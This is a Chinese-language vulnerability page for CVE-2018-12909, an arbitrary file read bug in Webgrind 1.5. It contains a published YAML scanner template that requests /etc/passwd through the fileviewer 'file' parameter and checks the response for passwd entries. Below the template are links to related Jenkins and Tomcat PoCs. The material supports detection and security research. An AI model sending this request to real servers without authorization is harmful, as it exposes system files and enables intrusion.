CVE-2018-12909: Webgrind fileviewer.phtml 任意文件读取漏洞

漏洞描述

PoC代码[已公开]

id: CVE-2018-12909

info:
  name: Webgrind fileviewer.phtml 任意文件读取漏洞
  author: zan8in
  severity: high
  description: |
    Webgrind是一套PHP执行时间分析工具。其中Webgrind 1.5版本中存在安全漏洞，该漏洞源于程序依靠用户输入来显示文件。攻击者可以通过漏洞读取服务器敏感文件
    app="Webgrind"
  reference:
    - http://wiki.peiqi.tech/wiki/webapp/Webgrind/Webgrind%20fileviewer.phtml%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2018-12909.html

rules:
  r0:
    request:
      method: GET
      path: /index.php?op=fileviewer&file=/etc/passwd
      headers:
        Cookie: redirect=1
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

相关漏洞推荐

• CVE-2018-12909: Webgrind <= 1.5 - Local File Inclusion POC

  2025-08-01 | Webgrind
  Webgrind 1.5 relies on user input to display a file, which lets anyone view files from the local fil...

• Webgrind1.5 index.php文件file参数-文件包含漏洞(CVE-2018-12909) 无POC

  2021-01-19 | Webgrind1.5
  【漏洞对象】Webgrind1.5版本 【涉及版本】1.5 【漏洞描述】 该系统index.php文件file参数由于过滤不严格导致文件包含漏洞。

• CVE-2018-1000600: Pre-auth Fully-responded SSRF POC

  2025-09-01 | Pre-auth
  A exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier...

• CVE-2018-1000861: Jenkins 2.138 Remote Command Execution POC

  2025-09-01 | Jenkins
  A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier...

• CVE-2018-11759: Apache Tomcat JK Connect <=1.2.44 - Manager Access POC

  2025-09-01 | Apache Tomcat JK Connect
  The Apache Web Server (httpd) specific code that normalised the requested path before matching it to...